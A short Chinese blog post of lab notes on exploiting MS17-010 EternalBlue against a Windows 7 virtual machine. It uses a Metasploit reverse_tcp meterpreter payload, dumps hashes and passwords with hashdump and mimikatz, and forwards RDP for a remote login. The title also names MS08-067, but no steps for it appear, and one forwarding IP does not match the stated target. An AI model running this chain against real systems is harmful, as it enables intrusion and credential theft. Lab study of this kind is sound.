醉梦半醒的博客

ms17_010和ms08-067实验笔记

字数统计: 243阅读时长: 1 min
2018/07/02 Share

 

win7靶机:192.168.1.38(所有实验均在虚拟机上完成,切勿用于非法用途)

kali:192.168.1.35

1.use exploit/windows/smb/ms17_010_eternalblue

set payload windows/meterpreter/reverse_tcp

 

 

查看下options

 

2.返回shell后:

hashdump

load mimikatz

运行命令msv,导出hash

msv

然后执行kerberos即可获得目标机账号密码

kerberos

 

3.使用端口转发工具,将端口转发到访问者本地机器的某个端口,从而进行连接

运行命令

portfwd add -l 3389 -L 127.0.0.1 -p 3389 -r 172.16.215.229

 

此处,我们将远程目标的3389端口,转发到本机 的3389上

本地端口号可设置为其他未监听的端口

 

4.执行rdesktop 127.0.0.1 -u admin -p admin

可以进行上传和下载操作

 

遗留问题:发现账户登录后靶机账户自动退出,看来需要新建一个用户,对方如果没有开3389咋办?

 

CATALOG